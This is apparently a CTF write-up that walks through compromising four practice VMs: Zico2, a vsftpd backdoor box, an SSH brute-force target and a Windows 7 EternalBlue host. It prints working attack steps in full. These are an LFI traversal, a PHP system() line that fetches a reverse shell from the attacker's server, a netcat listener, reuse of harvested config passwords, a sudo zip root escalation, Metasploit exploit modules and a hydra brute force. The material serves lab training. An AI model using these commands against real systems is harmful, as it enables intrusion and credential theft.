Metared Stage4 Write-ups 2nd Post
This post will be concentrating on the balance of the challenges I managed to complete during this CTF.
"Zico's Shop: A Boot2Root Machine intended to simulate a real world scenery - Description: Zico is trying to build his website but is having some trouble in choosing what CMS to use. After some tries on a few popular ones, he decided to build his own. Was that a good idea? Goal: Get root and read the flag file Type the text of the flag file."
There was a VM to download or an OVA file. Downloaded that and ran it using virtual box. First as always with these boxes is to run and Nmap scan as I wasn't sure of the IP address I scanned the whole network to see who was up:
nmap -sV -sC 10.38.1.0/24
-sC to run default scripts
-sV enumerate application versions
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-15 03:49 EST
Nmap scan report for 10.38.1.115
Host is up (0.0030s latency).
Not shown: 997 closed tcp ports (reset)
PORT??STATE SERVICE VERSION
22/tcp?open?ssh???OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:?
|??1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)
|??2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)
|_?256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)
80/tcp?open?http??Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Zico's Shop
|_http-server-header: Apache/2.2.22 (Ubuntu)
111/tcp open?rpcbind 2-4 (RPC #100000)
| rpcinfo:?
|??program version??port/proto?service
|??100000?2,3,4????111/tcp??rpcbind
|??100000?2,3,4????111/udp??rpcbind
|??100000?3,4?????111/tcp6?rpcbind
|??100000?3,4?????111/udp6?rpcbind
|??100024?1?????45315/udp6?status
|??100024?1?????47062/tcp6?status
|??100024?1?????55570/tcp??status
|_?100024?1?????59585/udp??status
MAC Address: 08:00:27:D2:27:D0 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
please forgive the formatting, okay so we can see that is has a webpage open on port 80, ssh on 22 and RPC bind on 111. Nothing too obvious here, so lets enumerate the website:
gobuster dir -u https://10.38.1.115 --wordlist /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -x pdf,txt,sh,py,js,html,php
I like gobuster as a command line tool, however dirbuster would be just as useful.
/img?????????(Status: 301) [Size: 308] [--> https://10.38.1.115/img/]
/index.html??????(Status: 200) [Size: 7970]???????????????
/index????????(Status: 200) [Size: 7970]???????????????
/tools????????(Status: 200) [Size: 8355]???????????????
/tools.html??????(Status: 200) [Size: 8355]???????????????
/view.php???????(Status: 200) [Size: 0]?????????????????
/view?????????(Status: 200) [Size: 0]?????????????????
/css?????????(Status: 301) [Size: 308] [--> https://10.38.1.115/css/]
/js??????????(Status: 301) [Size: 307] [--> https://10.38.1.115/js/]?
/vendor????????(Status: 301) [Size: 311] [--> https://10.38.1.115/vendor/]
/package???????(Status: 200) [Size: 789]?????????????????
/less?????????(Status: 301) [Size: 309] [--> https://10.38.1.115/less/]??
/server-status????(Status: 403) [Size: 292]?????????????????
/dbadmin???????(Status: 301) [Size: 312] [--> https://10.38.1.115/dbadmin/]
we have a few interesting pages here, for the sake of this post, we need the views.php and the dbadmin pages. After some googling around the view page can be vulnerable to LFI, so lets try that:
https://10.38.1.115/view.php?page=../../../../etc/passwd
and it works:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false messagebus:x:102:105::/var/run/dbus:/bin/false ntp:x:103:108::/home/ntp:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin vboxadd:x:999:1::/var/run/vboxadd:/bin/false statd:x:105:65534::/var/lib/nfs:/bin/false mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false zico:x:1000:1000:,,,:/home/zico:/bin/bash?
After a lot of messing around with this, it was evident we needed something else lets go over to the dbadmin page, after navigating there, click on the test_db.php page:
https://10.38.1.115/dbadmin/test_db.php
this brings up a login console just requiring a password, if we try some obvious ones - password, admin 12345 etc. the password is admin. Once there we find some passwords in the user database: root:653F4B285089453FE00E2AAFAC573414 and zico:96781A607F4E9F5F423AC01F0DAB0EBD, if we go over to https://crackstation.net/ and search the hashes we do get the password root:34kroot34 and zico:zico2215@. Tried to ssh with these as people often re-use password but it didn't work.
However on the login console it also tells us the version is phpLiteAdmin v1.9.3 and if we google this version, we find out it is vulnerable to PHP code injection according to https://www.exploit-db.com/exploits/24044, there is POC there which basically explains how to exploit this. Well we have LFI and a way to create php codes, lets get a reverse shell. If we go to https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php there is one there, just make sure to change the IP and Port to your IP and whatever port you will be setting up the NetCat listener on. First we have to download the reverse shell, we can use python to serve up the file using http.
python3 -m http.server 8080
Then we have to click create new database and name it shell.php its important to remember the php as this will give us execution. Once we have created the database click then where is says 'create new table on database' under name put whatever you like and number of fields is 1, click go. We will be directed to the 'new table' tab, under the filed column is where our php code will go, make sure the 'Type' field is set to text. The reverse shell on my system is called rev2.php
<?php system('wget https://$IP:8080/rev2.php');?>
Okay the python server says 200 so it seems it went well, lets set up a NetCat listener.
nc -lnvp 4444
l - listen for incoming connections
v - for verbose
n - Do not do any naming or service lookups on any addresses, hostnames, or ports.
p - specify port to listen on
Click create and then we need to execute this, so lets go over to the views page where we found the LFI vulnerability.
https://10.38.1.115/view.php?page=../../../../usr/databases/shell.php
When we navigate to this page we get a reverse shell on nc:
$ whoami
www-data
Lets stabilize the shell with python, its not necessary but I prefer it:
python -c "import pty; pty.spawn('/bin/bash');"
Anyway, after a lot of looking around I found the directory, /home/zico/wordpress, there is a wp-config.php file if we cat this out we get the following:
<?php
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'zico');
/** MySQL database username */
define('DB_USER', 'zico');
/** MySQL database password */
define('DB_PASSWORD', 'sWfCsfJSPV9H3AmQzw8');
Here we can see a Password for the database, but passwords are often reused, as we saw for the /etc/passwd file there is a user named zico. We know ssh is open so lets try:
password = sWfCsfJSPV9H3AmQzw8
This works and we are in from ssh, but we need to privesc to root to read the flag. Start simple try run:
sudo -l
-l, --list?If no command is specified, list the allowed (and
?????????forbidden) commands for the invoking user (or the user
?????????specified by the -U option) on the current host.?A
?????????longer list format is used if this option is specified
?????????multiple times and the security policy supports a
?????????verbose output format.
This gives us 2 options where root can be run with no password I chose zip, head over to https://gtfobins.github.io/ to see what can be done and run the following:
>TF=$(mktemp -u)
>sudo zip $TF /etc/hosts -T -TT 'sh #'
>sudo rm $TF
this will give you root:
$ whoami
root
go to the root directory and cat out the flag file.
Flag = ROOOOT!You did it! Congratz!Hope you enjoyed!
I learned after the CTF was over this box is actually on vulnhub so, If you enjoyed reading this, have virtual box and want to try yourself go to https://www.vulnhub.com/entry/zico2-1,210/ download the ova enjoy!
"Getting FTP access you will find the flag - Get access to the virtual machine from the FTP service there you will find the flag."
Download the ova and run it virtual box. After an nmap scan:
nmap -sC -sV 10.38.1.111
We find the FTP service is running on port 21 lets see what happens if we try to scan it with nmap using the scripts engine:
nmap --script=vuln -p 21 10.38.1.111
and it says it is vulnerable to vsftpd_234_backdoor so lets fire up metasploit and see if this works
msfconsole
and we can see it does indeed have that script:
use exploit/unix/ftp/vsftpd_234_backdoor
set payload payload/cmd/unix/reverse
then set the RHOSTS to the vulnerable machine 10.38.1.111 in my case and the LHOSTS to your own IP, and that's it, we get back a reverse shell, and we can cat the flag.txt file from there.
"Figure out the hidden message in the VM - From the virtual machine it is required to obtain the credentials to access by ssh, the user has a country of culinary destination as a name. I leave you the dictionary."
We have another ova to download however it is the same machine as the ftp one. So we can cat the /etc/passwd file to view the users to make sure we have the correct one and we see peru as a user so we can be sure. Given that this was the peru CTF that would've also lead to the same conlcusion. So lets bruteforce the ssh login using hydra:
hydra -l peru -P userlist.txt ssh://10.38.1.113
-l to specify one user -L would specify a user list
-P to specify password list and -p would specify one password
and we get the answer "Cev1chePeru4no" and this is the flag.
Flag = Cev1chePeru4no
"Access the desktop - Enter the desktop of this machine and look for the flag."
We are given a windows 7 ova to download this time. When we run it it just brings us to a login screen. Lets attack it!
Running nmap shows that it is windows 7 with SMB running, this leads me to think eternal blue as I have covered this machine a few times in a few courses I took. So lets try that:
Fire up metasploit again with msfconsole, after some googling eternal blue is known as ms-17 on metasploit.
search search ms17-010
use the first option or option 0
use 0
set the RHOSTS to the vulnerable machine and the LHOSTS to your own IP and then type run and hit enter. Thats its a meterpreter shell with root this time, no privesc neccessary. Just navigate over to the desktop, this is windows so use type instead of cat:
type flag.txt
and thats it!
Thank you for taking the time to read this, I hope you enjoyed it!